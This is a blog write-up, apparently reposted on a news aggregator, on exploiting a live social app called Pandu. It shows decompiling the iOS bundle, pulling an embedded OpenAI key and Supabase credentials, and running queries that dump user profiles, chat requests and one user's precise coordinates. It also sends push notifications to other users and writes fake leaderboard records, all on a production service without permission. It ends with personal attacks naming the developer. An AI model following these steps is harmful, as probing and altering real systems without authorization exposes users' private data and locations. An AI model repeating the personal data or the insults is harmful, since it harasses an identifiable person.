"Just Fucking Ship IT" (Or: On Vibecoding)
Preface
I have minimal experience with exploitation or security research- some techniques employed in this write-up are almost certainly suboptimal. This is not a tutorial, do not treat it as such. Sensitive information has been censored as best as possible.
Introduction
Earlier in the year I attended a hackathon organized by my university's IEEE branch. My team and I managed to hack together a pretty decent submission, and for our efforts, we were rewarded with second place. Among the submissions, a one Mentora piqued my interest. Mentora marketed itself as an "AI tutor", seeking to gamify quizzes and provide personalized lesson plans using, you guessed it, large language models.
Interested, I began to explore the "How we built it" section of the Devpost. React Native, Supabase, and OpenAI integration. Yup! This reeks of vibe coder slop. Unfortunately, Mentora never seemed to see the light of day. Luckily, our hero didn't stop there, and this time he's breaking into the social media market. Enter: Pandu.
What even is Pandu?
Much like Mentora, Pandu is a pretty generic take on an existing genre but with more AI slop. Disappointingly, there is yet to be an Android release of Pandu, and given that I don't own any Apple devices, investigating this might be a little rough.
First Steps
Apparently, Apple's IPA format is encrypted, meaning that blindly pulling files from a server and expecting to be able to read them isn't going to work. Luckily, someone has managed to automate this process of decrypting these bundles and has even been so kind as to expose the tooling behind a Telegram bot.
After acquiring the decrypted IPA, I simply suffixed the file with .zip and extracted it:
unzip pandu_ipa_v103.ipa.zip
The archive yielded a Payload/ folder, with the following structure:
The main file of interest here is the main.jsbundle, which appears to be a JavaScript bundle compiled with Hermes. After a quick pass with hermes-dec, I was left with a mostly readable blob of pseudocode:
python hbc_decompiler.py ./Payload/Pandu.app/main.jsbundle pandu_decomp.js
Initial Investigation
I began my search by looking for very low-hanging fruit. Surely an app published on the App Store wouldn't expose an OpenAI key, right?
grep "'sk-" pandu_decomp.js
r11 = 'sk-proj-*************************************************';
WHAT? There. Is. No. Way.
curl "https://api.openai.com/v1/responses" \
-H "Content-Type: application/json" \
-H "Authorization: Bearer sk-proj-********" \
-s \
-d '{
"model": "gpt-4.1",
"input": "Write me a haiku about why it is not a great idea to hard-code OpenAI API keys into client-facing applications."
}' | jq -r '.output[0].content[0].text'
Secrets in plain sight—
Exposed keys invite misuse,
Guard doors, don’t paint signs.
So it turns out that all the fancy LLM integration is handled client-side, with the users' device issuing the OpenAI API queries and forwarding the output to the "backend" (if you can even call it that, I'll get to this later).
Now that we know that LLM queries are handled client-side, it shouldn't be too difficult to pull out the system prompt.
An LLM prompt isn't exactly "valuable information," and "prompt engineering" is most definitely not a skill- Nonetheless I'm expecting this to be quite funny.
"You are a Gen Z App, You are Pandu,you are helping a user spark conversations with a new user, you are not cringe and you are not too forward, be human-like. You generate 1 short, trendy, and fun conversation starter. It should be under 100 characters and should not be unfinished. It should be tailored to the user's vibe or profile info. Keep it casual or playful and really gen z use slangs and emojis. No Quotation mark"
I wonder what prompted him to tell the model not to be cringe.
Supabase
If you aren't familiar, Supabase is a Backend-as-a-Service, providing CRUD-accessible endpoints, a database, storage buckets, authentication, and even real-time communication. The upside of something like this is that you don't need to understand the complexities that come with backend development in order to build something that "just works". However, you'll later come to see that this is also a hidden downside, as some people shouldn't be permitted within 10 feet of a backend.
Taking the place of a standard database, Supabase expects the client to talk directly to the database- now, you might be thinking to yourself: "isn't that a horrible idea?" and to your question, I'll reply "yes." The assumption is that the person in charge of configuring Supabase will correctly dish out permissions such that end-users cannot simply read/write to arbitrary relations, but as you'll soon see, this is not always the case.
With the decompiled pseudocode in hand, it was as simple as grepping for a few keywords:
function(...) {
...
r1 = {'storage': null, 'autoRefreshToken': true, 'persistSession': true, 'detectSessionInUrl': false};
r3 = r3.default;
r1['storage'] = r3;
r4['auth'] = r1;
r3 = 'https://XXXXXXXXXXXX.supabase.co'; // supabaseUrl
r1 = 'eyJh.XXXXXXXX.XXXXXXXXX'; // supabaseAnonKey
r1 = r5.bind(r0)(r3, r1, r4); // r1 = createClient(supabaseUrl, supabaseAnonKey, r4);
r2['supabase'] = r1;
r1 = r1.auth;
r1 = r1.admin;
r2['adminAuthClient'] = r1;
return r0;
};
Now that we have the Supabase information, it's time to go hunting for relations that might be useful. After some investigation, it appears that all Supabase queries follow roughly the same pattern in the pseudocode:
r6 = r4.supabase; // supabase.from('user_wallet')...
r4 = r6.from;
r13 = 'user_wallet';
...
With this in mind, we can write some cheeky Python that'll help us filter through this checks notes 1.5M LoC blob.
I know that this could be accomplished with a regex, but I'm stubborn and refuse to change
relations: list[str] = []
with open("pandu_decomp.js") as file:
lines = file.readlines()
for line_num, line in enumerate(lines):
if "supabase" not in line:
continue
if "from" not in lines[line_num + 1] or "":
continue
target_line = lines[line_num + 2] or ""
if "'" in target_line:
target_line_parts = target_line.split("'")
relation = target_line_parts[1]
if relation not in relations:
relations.append(relation)
print(relation)
And let's run it!
python find_relations.py
profiles
user_wallet
user_progression
engagement_scores
user_interests
user_locations
user_wallets
flaggame
user_friendships
friend_requests
blocked_users
reports
game_requests
guessmoji_game
rizzme_game
tic_tac_toe_game
truthordare_game
user_views
user_likes
game_ideas
chat_requests
These relation names are... interesting to say the least.
Let's poke around and see what we have access to, a quick select from the profiles relation doesn't seem like a terrible idea ;).
import { createClient } from '@supabase/supabase-js';
const supabaseUrl = 'https://XXXXXXXXXXXX.supabase.co';
const supabaseAnonKey = 'eyJh.XXXXXXXX.XXXXXXXXX';
const supabase = createClient(supabaseUrl, supabaseAnonKey, {});
const result = await supabase
.from("profiles")
.select()
.limit(1)
console.log(result["data"])
[
{
"id": "3c0f201b-6dee-4858-85d4-ced865223027",
"updated_at": "2025-06-24T02:33:22.3+00:00",
"nickname": null,
"age": null,
"birth_date": null,
"gender": null,
"user_id": null,
"bio": null,
"avatar_url": [ null ],
"expo_push_token": null,
"created_at": null,
"username": null,
"full_name": null,
"completed_onboarding": false,
"hasActiveSubscription": false,
"engagement_score": 0,
"online": true,
"verified": false
}
]
Well, this is odd. I'm assuming this is a blank account that was created during testing? Either way, we now have a list of fields which is exactly what I was looking for.
let brokenProfiles = await supabase
.from("profiles")
.select()
.is("username", null)
let nonBrokenProfiles = await supabase
.from("profiles")
.select()
.not("username", "is", null)
let suckers = await supabase
.from("profiles")
.select()
.eq("hasActiveSubscription", true)
console.log("broken profiles:", brokenProfiles["data"].length);
console.log("non-broken profiles:", nonBrokenProfiles["data"].length);
console.log("suckers:", suckers["data"].length);
broken profiles: 1286
non-broken profiles: 9427
suckers: 146
Weird. I'm not quite sure what this indicates, but those numbers are certainly interesting.
(Can you believe that nearly 10k people were dumb enough to sign up for this app?)
Expo
I've gone ahead and had my girlfriend create an account on her iPhone, this way I can explore a little more without having to worry about stepping on anyone's toes.
let result = await supabase
.from("profiles")
.select()
.eq("username", "zoe604385")
{
"id": "67cf4fd4-90b0-4f90-9103-1e53dca44787",
"updated_at": "2025-07-07T02:05:50.224+00:00",
"nickname": "zoe",
"age": 25,
"birth_date": "2000-01-01",
"gender": "other",
"user_id": null,
"bio": "i am passionate about gooning",
"avatar_url": [ "1751232382134_0.jpg" ],
"expo_push_token": "ExponentPushToken[**********]",
"created_at": "2025-06-29T21:24:34.481+00:00",
"username": "zoe604385",
"full_name": null,
"completed_onboarding": true,
"hasActiveSubscription": false,
"engagement_score": 2.8,
"online": false,
"verified": false
}
There are a few things here that are noteworthy, but let's investigate the expo_push_token field. It appears that any time a notification is to be sent out, it is issued by the client, with the following steps being taken:
- Client queries
profilesrelation for recipients' Expo push token - Client issues POST request to Expo containing the notification content and the recipient's token
- Recipient queries Expo for pending notifications
- Recipient displays notification
Decompiled Pseudocode for Sending Notifications
r10 = r6;
r8 = global;
r6 = r8.HermesInternal;
r9 = r6.concat;
r7 = '';
r6 = ' won the Flag Game! 🏆🏳️';
r12 = r9.bind(r7)(r10, r6);
r9 = r8.fetch;
r7 = {};
r6 = 'POST';
r7['method'] = r6;
r6 = {};
r10 = 'application/json';
r6['Content-Type'] = r10;
r7['headers'] = r6;
r11 = r8.JSON;
r10 = r11.stringify;
r6 = {'to': null, 'title': 'Game Over 💔', 'body': null, 'data': null, 'sound': 'default', 'priority': 'high', 'channelId': 'default'};
r15 = r15.expo_push_token;
r6['to'] = r15;
r6['body'] = r12;
r12 = {'type': 'game_win', 'gameId': null, 'screen': 'FlagGame'};
r14 = _closure2_slot3;
r12['gameId'] = r14;
r12['winner'] = r13;
r6['data'] = r12;
r6 = r10.bind(r11)(r6);
r7['body'] = r6;
r6 = 'https://exp.host/--/api/v2/push/send';
r6 = r9.bind(r1)(r6, r7);
Under no circumstances should these Expo tokens be exposed to clients, however, the very architecture of this application relies on that being the case. With that in mind, I'm quite sure that it's possible to issue arbitrary push notifications to any user. According to the official Expo Docs all we need to do is issue the following POST request:
curl -H "Content-Type: application/json" -X POST "https://exp.host/--/api/v2/push/send" -d '{
"to": "ExponentPushToken[**********]",
"title":"",
"body": "<body>"
}<span>'</span></span></span>
</code></pre>
<p>I wonder if it worked...
<p><img src="https://coal.sh/assets/pandu_expo.jpg">
<h2>Hall of Fame</h2>
<p>The main feature that sets Pandu apart from other social media platforms is its integration of games. Despite being poorly executed and far from original, there seems to be a group of people competing for spot #1 on the in-game leaderboard. I don't quite like Pandu, but I definitely am competitive by nature- let's see what we can do.
<p>The rankings seem to be calculated client-side by simply querying the <code>user_progression</code> relation for the top 20 users sorted by total win count.
<pre><code><span>r1</span> <span>=</span> <span>new</span> <span>Array</span><span>(</span><span>2</span><span>)</span><span>;</span>
<span>r1</span><span>[</span><span>0</span><span>]</span> <span>=</span> <span>r13</span><span>;</span>
<span>r19</span> <span>=</span> <span>_closure1_slot5</span><span>;</span>
<span>r20</span> <span>=</span> <span>r19</span><span>.</span><span>supabase</span><span>;</span>
<span>r19</span> <span>=</span> <span>r20</span><span>.</span><span>from</span><span>;</span>
<span>r21</span> <span>=</span> <span><span>'</span>user_progression<span>'</span></span><span>;</span>
<span>r22</span> <span>=</span> <span>r19</span><span>.</span><span>bind</span><span>(</span><span>r20</span><span>)</span><span>(</span><span>r21</span><span>)</span><span>;</span>
<span>r20</span> <span>=</span> <span>r22</span><span>.</span><span>select</span><span>;</span>
<span>r19</span> <span>=</span> <span><span>'</span>id, username, nickname, wins, level, profiles!inner (avatar_url,age)<span>'</span></span><span>;</span>
<span>r24</span> <span>=</span> <span>r20</span><span>.</span><span>bind</span><span>(</span><span>r22</span><span>)</span><span>(</span><span>r19</span><span>)</span><span>;</span>
<span>r22</span> <span>=</span> <span>r24</span><span>.</span><span>order</span><span>;</span>
<span>r19</span> <span>=</span> <span>{</span><span>}</span><span>;</span>
<span>r19</span><span>[</span><span><span>'</span>ascending<span>'</span></span><span>]</span> <span>=</span> <span>r3</span><span>;</span>
<span>r20</span> <span>=</span> <span><span>'</span>wins<span>'</span></span><span>;</span>
<span>r24</span> <span>=</span> <span>r22</span><span>.</span><span>bind</span><span>(</span><span>r24</span><span>)</span><span>(</span><span>r20</span><span>,</span> <span>r19</span><span>)</span><span>;</span>
<span>r22</span> <span>=</span> <span>r24</span><span>.</span><span>limit</span><span>;</span>
<span>r19</span> <span>=</span> <span>20</span><span>;</span>
<span>r19</span> <span>=</span> <span>r22</span><span>.</span><span>bind</span><span>(</span><span>r24</span><span>)</span><span>(</span><span>r19</span><span>)</span><span>;</span>
<span>r1</span><span>[</span><span>1</span><span>]</span> <span>=</span> <span>r19</span><span>;</span>
<span>r1</span> <span>=</span> <span>r7</span><span>.</span><span>bind</span><span>(</span><span>r18</span><span>)</span><span>(</span><span>r1</span><span>)</span><span>;</span>
<span>SaveGenerator</span><span>(</span><span>address</span><span>=</span><span>309</span><span>)</span><span>;</span>
</code></pre>
<details>
<summary>
Cleaned-up Rankings Query
</summary>
<pre><code><span>let</span> <span>leaderboard</span> <span>=</span> <span>await</span> <span>supabase</span>
<span>.</span><span>from</span><span>(</span><span><span>"</span>user_progression<span>"</span></span><span>)</span>
<span>.</span><span>select</span><span>(</span><span><span>"</span>id, username, nickname, wins, level, profiles!inner (avatar_url,age)<span>"</span></span><span>)</span>
<span>.</span><span>order</span><span>(</span><span><span>"</span>wins<span>"</span></span><span>,</span> <span>{</span> <span>ascending</span><span>:</span> <span>false</span> <span>}</span><span>)</span>
<span>.</span><span>limit</span><span>(</span><span>20</span><span>)</span><span>;</span>
</code></pre>
</details>
<p>Presumably, all we should have to do is create a profile and propagate those aforementioned fields such that we satisfy the query. Additionally, we need to set the <code>user_id</code> field to satisfy the foreign key relationship between <code>user_progression</code> and <code>profiles</code>.
<p>First, let's create the account:
<pre><code><span>const</span> <span>auth</span> <span>=</span> <span>await</span> <span>supabase</span><span>.</span><span>auth</span><span>.</span><span>signUp</span><span>(</span>
<span>{</span>
<span>email</span><span>:</span> <span><span>"</span>john@fortnite.com<span>"</span></span><span>,</span>
<span>password</span><span>:</span> <span><span>"</span>fuckyounerd<span>"</span></span><span>,</span>
<span>}</span>
<span>)</span><span>;</span>
<span>const</span> <span>userId</span> <span>=</span> <span>auth</span><span>.</span><span>data</span><span>.</span><span>user</span><span>.</span><span>id</span><span>;</span>
</code></pre>
<p>And now we can propagate the fields of the relations:
<pre><code><span>await</span> <span>supabase</span>
<span>.</span><span>from</span><span>(</span><span><span>"</span>user_progression<span>"</span></span><span>)</span>
<span>.</span><span>upsert</span><span>(</span>
<span>{</span>
<span>id</span><span>:</span> <span>userId</span><span>,</span>
<span>user_id</span><span>:</span> <span>userId</span><span>,</span>
<span>username</span><span>:</span> <span><span>"</span>john_fortnite_xx<span>"</span></span><span>,</span>
<span>nickname</span><span>:</span> <span><span>"</span>john xx fortnite<span>"</span></span><span>,</span>
<span>wins</span><span>:</span> <span>6969</span><span>,</span>
<span>level</span><span>:</span> <span>1000000</span><span>,</span>
<span>}</span>
<span>)</span><span>;</span>
<span>await</span> <span>supabase</span>
<span>.</span><span>from</span><span>(</span><span><span>"</span>profiles<span>"</span></span><span>)</span>
<span>.</span><span>upsert</span><span>(</span>
<span>{</span>
<span>id</span><span>:</span> <span>userId</span><span>,</span>
<span>user_id</span><span>:</span> <span>userId</span><span>,</span>
<span>age</span><span>:</span> <span>100</span><span>,</span>
<span>avatar_url</span><span>:</span> <span>[</span><span><span>"</span>totallyrealimage.png<span>"</span></span><span>]</span>
<span>}</span>
<span>)</span><span>;</span>
</code></pre>
<p>And voilà! :)
<p><img src="https://coal.sh/assets/pandu_leaderboard.jpg">
<h2>Chats</h2>
<p>Moving on to something a bit more serious, the privacy implications of using software built by someone whose productive output is directly tied to the uptime of <a href="https://cursor.com/">Cursor</a> is absolutely horrendous. Despite his apparent lack of competence, it appears that he has (miraculously) managed to implement user chat sessions in a pretty solid way. By piggybacking off of Supabase's authentication and <a href="https://getstream.io/chat/tour/">StreamChat's</a> real-time communication API, he has completely avoided doing any heavy lifting himself. Smart.
<p>With this in mind, we should look for the tiny portion of this stack that he <em>is</em> responsible for creating. Before a chat session is initialized, a "chat request" is first sent out to a user, after which they can choose to either accept or reject the invitation. Checking the table of relations we mined earlier, the <code>chat_requests</code> relation seems like it might be relevant. Let's investigate.
<pre><code><span>await</span> <span>supabase</span>
<span>.</span><span>from</span><span>(</span><span><span>"</span>chat_requests<span>"</span></span><span>)</span>
<span>.</span><span>select</span><span>(</span><span>)</span>
<span>.</span><span>limit</span><span>(</span><span>1</span><span>)</span><span>;</span>
</code></pre>
<pre><code><span>[</span>
<span>{</span>
<span><span>"</span>id<span>"</span></span><span>:</span> <span><span>"</span>4a9793fd-2a12-4142-baa1-9552cf5df39c<span>"</span></span><span>,</span>
<span><span>"</span>created_at<span>"</span></span><span>:</span> <span><span>"</span>2025-04-17T01:02:26.087669+00:00<span>"</span></span><span>,</span>
<span><span>"</span>sender_id<span>"</span></span><span>:</span> <span><span>"</span>0f982e76-6479-4f7d-a995-b26a6d5ee5b6<span>"</span></span><span>,</span>
<span><span>"</span>sender_name<span>"</span></span><span>:</span> <span><span>"</span>Christian<span>"</span></span><span>,</span>
<span><span>"</span>sender_avatar<span>"</span></span><span>:</span> <span><span>"</span>1744702431504.jpg<span>"</span></span><span>,</span>
<span><span>"</span>receiver_id<span>"</span></span><span>:</span> <span><span>"</span>42a26d91-8ea3-492c-9038-ac1b79633e53<span>"</span></span><span>,</span>
<span><span>"</span>receiver_name<span>"</span></span><span>:</span> <span><span>"</span>Christopher<span>"</span></span><span>,</span>
<span><span>"</span>receiver_avatar<span>"</span></span><span>:</span> <span><span>"</span>1<span>"</span></span><span>,</span>
<span><span>"</span>message<span>"</span></span><span>:</span> <span><span>"</span>Yo wassup<span>"</span></span><span>,</span>
<span><span>"</span>status<span>"</span></span><span>:</span> <span><span>"</span>accepted<span>"</span></span>
<span>}</span>
<span>]</span>
</code></pre>
<p>Yup! Our suspicion is confirmed. <strong>Every single chat request is public!</strong> This is truly a nightmare. Even worse, I seemingly have read/write access to this table, meaning it's feasible to send chat requests with arbitrary messages on behalf of other users.
<h2>User Location</h2>
<p>Okay, I think it's time we stop beating around the bush. I'm sure if you've been an attentive reader you will have noticed the <code>user_locations</code> relation from earlier. The in-app use case of this appears to be matching users up with others who are geographically close to them. While I understand the justification for a feature like this, the execution here is dangerously flawed. With a single <code>select</code> I am able to pull the live geographic location of any user on the app. You heard me right. This is <em>not</em> the future of social media, <strong>it's a sexual predator's wet dream</strong>.
<pre><code><span>await</span> <span>supabase</span>
<span>.</span><span>from</span><span>(</span><span><span>"</span>user_locations<span>"</span></span><span>)</span>
<span>.</span><span>select</span><span>(</span><span>)</span>
<span>.</span><span>eq</span><span>(</span><span><span>"</span>id<span>"</span></span><span>,</span> <span><span>"</span>0f982e76-6479-4f7d-a995-b26a6d5ee5b6<span>"</span></span><span>)</span>
</code></pre>
<pre><code><span>[</span>
<span>{</span>
<span><span>"</span>created_at<span>"</span></span><span>:</span> <span><span>"</span>2025-03-17T16:15:45.062944+00:00<span>"</span></span><span>,</span>
<span><span>"</span>latitude<span>"</span></span><span>:</span> <span>42.6897712735434</span><span>,</span>
<span><span>"</span>longitude<span>"</span></span><span>:</span> <span>-73.8244290461434</span><span>,</span>
<span><span>"</span>country<span>"</span></span><span>:</span> <span><span>"</span>United States<span>"</span></span><span>,</span>
<span><span>"</span>state<span>"</span></span><span>:</span> <span><span>"</span>NY<span>"</span></span><span>,</span>
<span><span>"</span>last_updated<span>"</span></span><span>:</span> <span><span>"</span>2025-04-15T07:30:23.973+00:00<span>"</span></span><span>,</span>
<span><span>"</span>city<span>"</span></span><span>:</span> <span><span>"</span>Albany<span>"</span></span><span>,</span>
<span><span>"</span>id<span>"</span></span><span>:</span> <span><span>"</span>0f982e76-6479-4f7d-a995-b26a6d5ee5b6<span>"</span></span><span>,</span>
<span><span>"</span>user_id<span>"</span></span><span>:</span> <span><span>"</span>0f982e76-6479-4f7d-a995-b26a6d5ee5b6<span>"</span></span>
<span>}</span>
<span>]</span>
</code></pre>
<p>If you need even more compelling evidence that this app is downright dangerous, take a quick look at this histogram of profile count by age:
<p><img src="https://coal.sh/assets/pandu_age_distribution.png">
<p>Nearly a thousand children under the age of 18 with their live location, photo, and age being beamed up to a database that's left wide open. Criminal.
<h1>Enter Christian</h1>
<p><img src="https://coal.sh/assets/christian_porn_bad.png">
Christian is the "mastermind" behind this technological shitshow and its parent company, <a href="https://www.linkedin.com/company/lunexis-technologies/">Lunexis</a>. As you've already seen, this man needs no introduction.
<p><img src="https://coal.sh/assets/pandu_eight.png">
<p>At first, I was wondering how he managed to even publish something like this, but I'm starting to think that Apple just got tired of rejecting it over and over.
<h1>Takeaway</h1>
<p>"Vibe coding" isn't just a cheap shortcut, it's <strong>reckless and dangerous</strong>. Christian's incompetence is jeopardizing the privacy of hundreds of people, all while he lines his pockets. What he is doing is <strong>illegal, perverse, and downright disgusting.</strong>
<p>Think I'm exaggerating? I was planning on doing some math to estimate his MRR, but it looks like he's already gone ahead and bragged about it on <a href="https://x.com/chrismonfiston/">Twitter</a>.
<p><img src="https://coal.sh/assets/christian_mrr.png">
<p>Earlier in this write-up I managed to identify 146 active subscribers, assuming this figure is accurate and his revenue-per-subscription has stayed constant, that leaves us with an estimated MRR just north of $2,500. He is making serious money and has absolutely no clue what he's doing!
<h1>Call to Action</h1>
<p>Calling this platform harmful is <strong>not an understatement</strong>. I am urging you to <strong>stop supporting this creator</strong>, <strong>report the app immediately</strong>, and <strong>get friends and loved ones off of this app as swiftly as possible</strong>.
</div> </div>
<div class="d-flex flex-row-reverse mt-4">
<a href="https://coal.sh/blog/pandu_bad" class="btn btn-md btn-custom" target="_blank" rel="nofollow">
Read More <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="m-l-5" viewBox="0 0 16 16">
<path fill-rule="evenodd" d="M1 8a.5.5 0 0 1 .5-.5h11.793l-3.147-3.146a.5.5 0 0 1 .708-.708l4 4a.5.5 0 0 1 0 .708l-4 4a.5.5 0 0 1-.708-.708L13.293 8.5H1.5A.5.5 0 0 1 1 8z"/>
</svg>
</a>
</div>
<div class="d-flex flex-row post-tags align-items-center mt-5">
</div>
<div id="postNextPrevContainer" class="post-next-prev mt-5"></div>
<div class="row">
<div class="col-sm-12">
<div class="emoji-reactions-container noselect">
<h4 class="title-reactions">What's Your Reaction?</h4>
<div id="reactions_result">
<div class="emoji-reactions">
<div class="reaction-container">
<div class="reaction" onclick="addReaction('9185', 'like');">
<img src="https://blacknews.news/assets/img/reactions/like.png" alt="Like" class="emoji">
<span class="text">Like</span>
<span class="vote">0</span>
</div>
</div>
<div class="reaction-container">
<div class="reaction" onclick="addReaction('9185', 'dislike');">
<img src="https://blacknews.news/assets/img/reactions/dislike.png" alt="Dislike" class="emoji">
<span class="text">Dislike</span>
<span class="vote">0</span>
</div>
</div>
<div class="reaction-container">
<div class="reaction" onclick="addReaction('9185', 'love');">
<img src="https://blacknews.news/assets/img/reactions/love.png" alt="Love" class="emoji">
<span class="text">Love</span>
<span class="vote">0</span>
</div>
</div>
<div class="reaction-container">
<div class="reaction" onclick="addReaction('9185', 'funny');">
<img src="https://blacknews.news/assets/img/reactions/funny.png" alt="Funny" class="emoji">
<span class="text">Funny</span>
<span class="vote">0</span>
</div>
</div>
<div class="reaction-container">
<div class="reaction" onclick="addReaction('9185', 'angry');">
<img src="https://blacknews.news/assets/img/reactions/angry.png" alt="Angry" class="emoji">
<span class="text">Angry</span>
<span class="vote">0</span>
</div>
</div>
<div class="reaction-container">
<div class="reaction" onclick="addReaction('9185', 'sad');">
<img src="https://blacknews.news/assets/img/reactions/sad.png" alt="Sad" class="emoji">
<span class="text">Sad</span>
<span class="vote">0</span>
</div>
</div>
<div class="reaction-container">
<div class="reaction" onclick="addReaction('9185', 'wow');">
<img src="https://blacknews.news/assets/img/reactions/wow.png" alt="Wow" class="emoji">
<span class="text">Wow</span>
<span class="vote">0</span>
</div>
</div></div> </div>
</div>
</div>
</div>
<div class="d-flex about-author">
<div class="flex-shrink-0">
<a href="https://blacknews.news/profile/admin" class="author-link">
<img src="https://blacknews.news/assets/img/user.png" alt="admin" class="img-fluid img-author" width="110" height="110">
</a>
</div>
<div class="flex-grow-1 ms-3">
<strong class="username"><a href="https://blacknews.news/profile/admin"> admin </a></strong>
<div class="social">
<ul class="profile-social-links">
<li><a href="https://blacknews.news/rss/author/admin"><i class="icon-rss"></i></a></li>
</ul>
</div>
</div>
</div>
<section class="section section-related-posts mt-5">
<div class="row">
<div class="col-12">
<div class="section-title">
<div class="d-flex justify-content-between align-items-center">
<h3 class="title">Related Posts</h3>
</div>
</div>
<div class="section-content">
<div class="row">
<div class="col-sm-12 col-md-6 col-lg-4">
<div class="post-item">
<div class="image ratio">
<a href="https://blacknews.news/police-preparing-for-donald-trump-to-visit-scotland">
<img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAcIAAAEYAQMAAAD1c2RPAAAAA1BMVEUAAACnej3aAAAAAXRSTlMAQObYZgAAACVJREFUaN7twQEBAAAAgqD+r26IwAAAAAAAAAAAAAAAAAAAACDoP3AAASZRMyIAAAAASUVORK5CYII=" data-src="https://ichef.bbci.co.uk/news/1024/branded_news/743c/live/a295ad00-5ccb-11f0-a847-6f5cde5d04a4.jpg" alt="Police preparing for Donald Trump to visit Scotland" class="img-fluid lazyload" width="269" height="160"/>
</a>
</div>
<h3 class="title fsize-16"><a href="https://blacknews.news/police-preparing-for-donald-trump-to-visit-scotland">Police preparing for Donald Trump to visit Scotland</a></h3>
<p class="small-post-meta"> <a href="https://blacknews.news/profile/admin" class="a-username">admin</a>
<span>Jul 9, 2025</span>
<span><i class="icon-comment"></i> 0</span>
<span class="m-r-0"><i class="icon-eye"></i> 0</span>
</p>
</div>
</div>
<div class="col-sm-12 col-md-6 col-lg-4">
<div class="post-item">
<div class="image ratio">
<a href="https://blacknews.news/a-fast-3d-collision-detection-algorithm">
<img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAcIAAAEYAQMAAAD1c2RPAAAAA1BMVEUAAACnej3aAAAAAXRSTlMAQObYZgAAACVJREFUaN7twQEBAAAAgqD+r26IwAAAAAAAAAAAAAAAAAAAACDoP3AAASZRMyIAAAAASUVORK5CYII=" data-src="https://substackcdn.com/image/fetch/$s_!EE06!,w_1200,h_600,c_fill,f_jpg,q_auto:good,fl_progressive:steep,g_auto/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fff0180cb-b892-4670-977f-f25f5f4a4421_998x637.png" alt="A fast 3D collision detection algorithm" class="img-fluid lazyload" width="269" height="160"/>
</a>
</div>
<h3 class="title fsize-16"><a href="https://blacknews.news/a-fast-3d-collision-detection-algorithm">A fast 3D collision detection algorithm</a></h3>
<p class="small-post-meta"> <a href="https://blacknews.news/profile/admin" class="a-username">admin</a>
<span>Jul 9, 2025</span>
<span><i class="icon-comment"></i> 0</span>
<span class="m-r-0"><i class="icon-eye"></i> 0</span>
</p>
</div>
</div>
<div class="col-sm-12 col-md-6 col-lg-4">
<div class="post-item">
<div class="image ratio">
<a href="https://blacknews.news/russia-makes-record-attack-on-ukraine-as-trump-castigates-putin">
<img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAcIAAAEYAQMAAAD1c2RPAAAAA1BMVEUAAACnej3aAAAAAXRSTlMAQObYZgAAACVJREFUaN7twQEBAAAAgqD+r26IwAAAAAAAAAAAAAAAAAAAACDoP3AAASZRMyIAAAAASUVORK5CYII=" data-src="https://static01.nyt.com/images/2025/07/09/multimedia/09int-ukraine-strike-gmwz/09int-ukraine-strike-gmwz-mediumSquareAt3X.jpg?#" alt="Russia Makes Record Attack on Ukraine as Trump Castigates Putin" class="img-fluid lazyload" width="269" height="160"/>
</a>
</div>
<h3 class="title fsize-16"><a href="https://blacknews.news/russia-makes-record-attack-on-ukraine-as-trump-castigates-putin">Russia Makes Record Attack on Ukraine as Trump Castigat...</a></h3>
<p class="small-post-meta"> <a href="https://blacknews.news/profile/admin" class="a-username">admin</a>
<span>Jul 9, 2025</span>
<span><i class="icon-comment"></i> 0</span>
<span class="m-r-0"><i class="icon-eye"></i> 0</span>
</p>
</div>
</div>
<div class="col-sm-12 col-md-12"></div>
<div class="col-sm-12 col-md-6 col-lg-4">
<div class="post-item">
<div class="image ratio">
<a href="https://blacknews.news/linda-yaccarino-departs-as-boss-of-musks-x">
<img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAcIAAAEYAQMAAAD1c2RPAAAAA1BMVEUAAACnej3aAAAAAXRSTlMAQObYZgAAACVJREFUaN7twQEBAAAAgqD+r26IwAAAAAAAAAAAAAAAAAAAACDoP3AAASZRMyIAAAAASUVORK5CYII=" data-src="https://ichef.bbci.co.uk/news/1024/branded_news/6a0a/live/e74e7530-5cda-11f0-9c4e-8937711cc91c.jpg" alt="Linda Yaccarino departs as boss of Musk's X" class="img-fluid lazyload" width="269" height="160"/>
</a>
</div>
<h3 class="title fsize-16"><a href="https://blacknews.news/linda-yaccarino-departs-as-boss-of-musks-x">Linda Yaccarino departs as boss of Musk's X</a></h3>
<p class="small-post-meta"> <a href="https://blacknews.news/profile/admin" class="a-username">admin</a>
<span>Jul 9, 2025</span>
<span><i class="icon-comment"></i> 0</span>
<span class="m-r-0"><i class="icon-eye"></i> 0</span>
</p>
</div>
</div>
<div class="col-sm-12 col-md-6 col-lg-4">
<div class="post-item">
<div class="image ratio">
<a href="https://blacknews.news/ukraine-suffers-heaviest-attack-as-trump-criticises-putin">
<img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAcIAAAEYAQMAAAD1c2RPAAAAA1BMVEUAAACnej3aAAAAAXRSTlMAQObYZgAAACVJREFUaN7twQEBAAAAgqD+r26IwAAAAAAAAAAAAAAAAAAAACDoP3AAASZRMyIAAAAASUVORK5CYII=" data-src="https://ichef.bbci.co.uk/news/1024/branded_news/4144/live/d7e8f9c0-5cae-11f0-ae37-a7df7603ca40.jpg" alt="Ukraine suffers heaviest attack as Trump criticises Putin" class="img-fluid lazyload" width="269" height="160"/>
</a>
</div>
<h3 class="title fsize-16"><a href="https://blacknews.news/ukraine-suffers-heaviest-attack-as-trump-criticises-putin">Ukraine suffers heaviest attack as Trump criticises Putin</a></h3>
<p class="small-post-meta"> <a href="https://blacknews.news/profile/admin" class="a-username">admin</a>
<span>Jul 9, 2025</span>
<span><i class="icon-comment"></i> 0</span>
<span class="m-r-0"><i class="icon-eye"></i> 0</span>
</p>
</div>
</div>
<div class="col-sm-12 col-md-6 col-lg-4">
<div class="post-item">
<div class="image ratio">
<a href="https://blacknews.news/serving-a-half-billion-requests-per-day-with-rust-and-cgi">
